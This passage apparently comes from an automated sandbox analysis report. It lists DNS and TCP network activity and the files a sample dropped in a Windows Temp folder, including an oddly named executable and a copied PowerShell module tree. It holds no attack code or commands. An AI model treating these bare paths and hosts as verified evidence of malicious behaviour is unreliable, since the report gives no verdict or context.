US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\NetSecurity\it\Microsoft.Windows.Firewall.Commands.Resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcwpxkz3.btp.ps1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\default.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\PSEvents.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\it-IT\default.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\fr-FR\pwrshmsg.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\fr-FR\pspluginwkr.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\fr-FR\PSEvents.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\fr-FR\powershell.exe.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\fr-FR\default.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Examples\profile.ps1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\es-ES\pwrshmsg.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\es-ES\pspluginwkr.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\es-ES\PSEvents.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\es-ES\powershell.exe.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\ja-JP\powershell.exe.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\en\Microsoft.AppV.AppVClientPowerShell.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\Appx\Appx.psd1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\Appx\Appx.format.ps1xml

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\Appx\ja-JP\Appx.psd1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\Appx\fr-FR\Appx.psd1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\Appx\es-ES\Appx.psd1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\Appx\en-US\Appx.psd1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\Microsoft.AppV.ClientProgrammability.Eventing.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\Microsoft.AppV.AppvClientComConsumer.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\AppVClientCmdlets.psm1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\AppVClientCmdlets.format.ps1xml

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\ja\Microsoft.AppV.AppVClientPowerShell.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\ja\Microsoft.AppV.AppvClientComConsumer.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\it\Microsoft.AppV.AppVClientPowerShell.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\it\Microsoft.AppV.AppvClientComConsumer.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\fr\Microsoft.AppV.AppVClientPowerShell.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\fr\Microsoft.AppV.AppvClientComConsumer.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\es\Microsoft.AppV.AppVClientPowerShell.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\es\Microsoft.AppV.AppvClientComConsumer.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\en\Microsoft.AppV.AppvClientComConsumer.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\de\Microsoft.AppV.AppVClientPowerShell.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\de\Microsoft.AppV.AppvClientComConsumer.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppLocker\AppLocker.psd1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppBackgroundTask\PS_BackgroundTask.cdxml

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppBackgroundTask\MSFT_BackgroundTask.Format.ps1xml

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppBackgroundTask\Microsoft.Windows.AppBackgroundTask.Commands.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppBackgroundTask\AppBackgroundTask.psd1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\ja-JP\pwrshmsg.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\ja-JP\PSEvents.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\AppvClient\AppvClient.psd1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\ja-JP\pspluginwkr.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\ja-JP\default.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\it-IT\pwrshmsg.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\it-IT\pspluginwkr.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\it-IT\PSEvents.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\it-IT\powershell.exe.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\es-ES\default.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\en-US\pwrshmsg.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\en-US\pspluginwkr.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\en-US\PSEvents.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\en-US\powershell.exe.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\en-US\default.help.txt

C:\Users\Admin\AppData\Local\Temp\gxeofiu\en\powershell_ise.resources.dll

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\pwrshmsg.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\pspluginwkr.dll.mui

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\powershell.exe.mui

C:\Users\Admin\AppData\Local\Temp\TCD8785.tmp\sist02.xsl
